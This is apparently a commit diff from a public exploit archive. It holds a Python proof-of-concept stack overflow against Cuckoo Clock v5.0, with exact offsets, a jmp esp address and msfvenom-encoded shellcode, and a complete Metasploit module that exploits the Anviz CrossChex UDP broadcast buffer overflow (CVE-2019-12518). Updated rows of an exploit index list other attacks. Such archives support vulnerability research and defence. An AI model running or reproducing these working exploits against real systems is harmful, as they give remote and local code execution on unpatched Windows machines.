# Tested On: Windows 10 (32-bit)
#
# Recreate:
# 1) Install & Open Cuckoo Clock v5.0
# 2) Right Click app icon (bottom right), click Alarms
# 3) Click the Add Button
# 4) Run Python script
# 5) Open generated poc.txt, then select-all & copy-all
# 6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer
# 7) Press Back Button and shellcode will execute
# EIP Overwrite at 260 Bytes
# Max Buffer space is 1287 bytes
# ESP points to payload at offset 264 bytes
# EBP overwrite at 256 bytes
# badChars = '\x00\x0d'
try:
ebpOffset = '\x41'*256
ebp = '\x42\x42\x42\x42'
eip = '\x16\x05\x03\x10' # 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll]
# ASLR: False, Rebase: False, SafeSEH: False (C:\Program Files\Parallaxis Cuckoo Clock\CERBERUS.dll)
# ESP points to payload at offset 264 bytes
# 1019 bytes = Remaining Buffer Length
fixStack = '\x89\xE5' # mov ebp,esp
fixStack += '\x83\xEC\x30' # sub esp,byte +0x30
# root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x0d' -f python -v shellcode
# x86/shikata_ga_nai chosen with final size 216
shellcode = b""
shellcode += b"\xdd\xc3\xbb\x9a\x4d\x57\xfa\xd9\x74\x24\xf4"
shellcode += b"\x58\x33\xc9\xb1\x30\x83\xe8\xfc\x31\x58\x14"
shellcode += b"\x03\x58\x8e\xaf\xa2\x06\x46\xad\x4d\xf7\x96"
shellcode += b"\xd2\xc4\x12\xa7\xd2\xb3\x57\x97\xe2\xb0\x3a"
shellcode += b"\x1b\x88\x95\xae\xa8\xfc\x31\xc0\x19\x4a\x64"
shellcode += b"\xef\x9a\xe7\x54\x6e\x18\xfa\x88\x50\x21\x35"
shellcode += b"\xdd\x91\x66\x28\x2c\xc3\x3f\x26\x83\xf4\x34"
shellcode += b"\x72\x18\x7e\x06\x92\x18\x63\xde\x95\x09\x32"
shellcode += b"\x55\xcc\x89\xb4\xba\x64\x80\xae\xdf\x41\x5a"
shellcode += b"\x44\x2b\x3d\x5d\x8c\x62\xbe\xf2\xf1\x4b\x4d"
shellcode += b"\x0a\x35\x6b\xae\x79\x4f\x88\x53\x7a\x94\xf3"
shellcode += b"\x8f\x0f\x0f\x53\x5b\xb7\xeb\x62\x88\x2e\x7f"
shellcode += b"\x68\x65\x24\x27\x6c\x78\xe9\x53\x88\xf1\x0c"
shellcode += b"\xb4\x19\x41\x2b\x10\x42\x11\x52\x01\x2e\xf4"
shellcode += b"\x6b\x51\x91\xa9\xc9\x19\x3f\xbd\x63\x40\x55"
shellcode += b"\x40\xf1\xfe\x1b\x42\x09\x01\x0b\x2b\x38\x8a"
shellcode += b"\xc4\x2c\xc5\x59\xa1\xc3\x8f\xc0\x83\x4b\x56"
shellcode += b"\x91\x96\x11\x69\x4f\xd4\x2f\xea\x7a\xa4\xcb"
shellcode += b"\xf2\x0e\xa1\x90\xb4\xe3\xdb\x89\x50\x04\x48"
shellcode += b"\xa9\x70\x67\x0f\x39\x18\x68"
Remainder = '\x46'*(1287-len(ebpOffset+ebp+eip+fixStack+shellcode))
payload = ebpOffset+ebp+eip+fixStack+shellcode+Remainder
File = 'poc.txt'
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'

82
exploits/windows/remote/48092.rb Executable file
View file

@ -0,0 +1,82 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'Payload' =>
{
'Space' => 8947,
'DisableNops' => true
},
'Arch' => ARCH_X86,
'EncoderType' => Msf::Encoder::Type::Raw,
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
register_options(
[
Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
])
end
def exploit
connect_udp
res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
if res.empty?
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end
print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded
udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end

15
files_exploits.csv
View file

@ -10963,6 +10963,12 @@ id,file,description,date,author,type,platform,port
48070,exploits/windows/local/48070.txt,"SprintWork 2.3.1 - Local Privilege Escalation",2020-02-14,boku,local,windows,
48071,exploits/windows/local/48071.md,"Windows Kernel - Information Disclosure",2020-01-27,Bitdefender,local,windows,
48072,exploits/php/local/48072.php,"PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass",2020-01-30,mm0r1,local,php,
48075,exploits/windows/local/48075.txt,"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path",2020-02-17,"Roberto Piña",local,windows,
48078,exploits/windows/local/48078.txt,"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path",2020-02-17,boku,local,windows,
48079,exploits/windows/local/48079.txt,"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation",2020-02-17,nu11secur1ty,local,windows,
48080,exploits/windows/local/48080.txt,"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
48085,exploits/windows/local/48085.txt,"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
48087,exploits/windows/local/48087.py,"Cuckoo Clock v5.0 - Buffer Overflow",2020-02-17,boku,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17999,6 +18005,7 @@ id,file,description,date,author,type,platform,port
48038,exploits/linux/remote/48038.rb,"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)",2020-02-10,Metasploit,remote,linux,25
48051,exploits/openbsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,openbsd,
48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,
48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42358,3 +42365,11 @@ id,file,description,date,author,type,platform,port
48047,exploits/php/webapps/48047.rb,"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
48066,exploits/php/webapps/48066.txt,"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection",2020-02-14,J3rryBl4nks,webapps,php,
48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,
48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
48076,exploits/php/webapps/48076.txt,"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting",2020-02-17,"Jinson Varghese Behanan",webapps,php,
48077,exploits/hardware/webapps/48077.txt,"Avaya Aura Communication Manager 5.2 - Remote Code Execution",2020-02-17,"Sarang Tumne",webapps,hardware,
48082,exploits/php/webapps/48082.txt,"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ashkan Moghaddas",webapps,php,
48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,

Can't render this file because it is too large.